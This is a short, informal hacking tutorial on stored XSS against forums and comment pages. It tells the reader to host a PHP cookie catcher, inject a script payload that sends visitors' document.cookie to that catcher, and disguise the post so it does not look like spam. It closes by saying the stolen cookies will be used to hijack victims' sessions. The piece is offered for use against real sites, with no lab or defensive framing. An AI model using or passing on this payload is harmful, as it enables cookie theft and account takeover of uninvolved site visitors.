Skip to main content

XSS Attack - Part 3

Hey awl :D welcome once again :P _____again in diz tut we will be talkinga bt xss :D n in diz tut we will concentrate on  persistent  based XSS :)  S0 here we go :D


    So,let us assume that we have found a XSS vulnerable forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS attack. 

    So now lets try to grab it's cookies. 

    First of all download a cookie catcher tool online by searching on google and upload it on any free hosting site which supports php . 

    Now come to that vulnerable site and if there is a box to type and submit then add the following code in it:

    Code:<script>document.location=" catcher.php?c=" + document.cookie</script>

    Replace the bold link with the link of your cookie catcher uploaded on free hosting site. 

    Now submit that post in the forum or the comment box and I would suggest to add some text before or after it so that it wont look like a spam.

     Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php 

    Search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be: catcher.php the container of the cookies would be:

    Now save these cookies as we gonna use them to hijack session of victim.... ;)